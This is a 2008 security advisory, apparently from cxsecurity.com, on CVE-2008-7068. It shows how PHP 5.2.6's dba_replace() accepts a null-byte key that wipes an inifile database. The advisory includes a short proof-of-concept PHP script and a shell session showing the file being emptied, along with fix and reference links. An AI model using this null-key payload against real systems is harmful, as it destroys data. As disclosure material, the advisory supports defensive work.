Bug: PHP 5.2.6 dba_replace() destroying file ( Ascii Version )

Search:
WLB2

PHP 5.2.6 dba_replace() destroying file

Published
Credit
Risk
2008.11.28
Maksymilian Arciemowicz
Medium
CWE
CVE
Local
Remote
CWE-20
CVE-2008-7068
Yes
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.4/10
4.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
Partial

[ PHP 5.2.6 dba_replace() destroying file ]

Author: Maksymilian Arciemowicz
Date:
- - Written: 10.11.2008
- - Public: 28.11.2008

Risk: Medium

Affected Software: PHP 5.2.6
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique
PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated
pages quickly.

NOTE:
These functions build the foundation for accessing Berkeley DB style databases.

dba_replace - Replace or insert entry

- --- 1. dba_replace() destroying file ---
Function dba_replace() are not filtring strings key and value. There is a possibility the destruction of the file.

# cat /www/dba.hack.php
<?php
$source=dba_open("/www/about.ini", "wlt", "inifile");
dba_replace("HOME","/www/",$source);
?>
# cat /www/about.ini
PATH=/
CURR=.
HOME=/home/
# php /www/dba.hack.php
# cat /www/about.ini
PATH=/
CURR=.
HOME=/www/
#

Well.
But, lets try use

# cat /www/dba.ham.php
<?php
$source=dba_open("/www/about.ini", "wlt", "inifile");
dba_replace("\0","/www/",$source);
?>
# php /www/dba.ham.php
# cat /www/about.ini
#

Now /www/about.ini, is emtpy.

- --- 2. How to fix ---
Fixed in CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?r1=1.2027.2.547.2.1313&r2=1.2027.2.547.2.1314&

- --- 3. Contact ---
Author: Maksymilian Arciemowicz

References:

http://xforce.iss.net/xforce/xfdb/47316
http://www.securityfocus.com/archive/1/archive/1/498746/100/0/threaded
http://www.securityfocus.com/archive/1/498982/100/0/threaded
http://www.securityfocus.com/archive/1/498981/100/0/threaded
http://www.osvdb.org/52206
http://cvs.php.net/viewvc.cgi/php-src/NEWS?r1=1.2027.2.547.2.1313&r2=1.2027.2.547.2.1314&
;

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version